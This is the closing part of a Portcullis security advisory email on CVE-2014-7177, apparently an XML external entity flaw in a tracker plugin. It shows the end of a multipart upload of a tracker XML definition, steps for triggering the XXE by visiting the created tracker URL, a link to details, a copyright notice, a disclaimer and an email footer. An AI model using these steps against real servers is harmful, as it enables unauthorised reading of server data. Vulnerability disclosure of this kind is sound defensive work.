    <permission scope="field" REF="F29" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F31" ugroup="UGROUP_PROJECT_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F32" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F32" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F32" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F33" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F33" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F33" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F34" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F34" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F34" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <!--TODO TRACKER_ADMIN <permission scope="field" REF="F31" ugroup="UGROUP_PLUGIN_TRACKER_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/> -->
  </permissions>
</tracker>

-----------------------------12077103611061
Content-Disposition: form-data; name="name"

Bugs
-----------------------------12077103611061
Content-Disposition: form-data; name="description"

Bugs Tracker
-----------------------------12077103611061
Content-Disposition: form-data; name="itemname"

bug
-----------------------------12077103611061
Content-Disposition: form-data; name="Create"

Créer
-----------------------------12077103611061--


2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:


https://[ip]/plugins/tracker/?group_id=102&tracker=12


3) Using retrieved tracker number and URL, a XXE can be trigerred by visiting the retrieved URL:


https://[ip]/plugins/tracker/?group_id=102&tracker=12


Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7177/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.


###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company, 
registered in England in accordance with the Companies 
Act under number 02763799. The registered office 
address of Portcullis Computer Security Limited is: 
Portcullis House, 2 Century Court, Tolpits Lane, Watford, 
United Kingdom, WD18 9RS.  
The information in this email is confidential and may be 
legally privileged. It is intended solely for the addressee. 
Any opinions expressed are those of the individual and 
do not represent the opinion of the organisation. Access 
to this email by persons other than the intended recipient 
is strictly prohibited.
If you are not the intended recipient, any disclosure, 
copying, distribution or other action taken or omitted to be 
taken in reliance on it, is prohibited and may be unlawful. 
When addressed to our clients any opinions or advice 
contained in this email is subject to the terms and 
conditions expressed in the applicable Portcullis Computer 
Security Limited terms of business.
###############################################################

#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared 
by MailMarshal.
#####################################################################################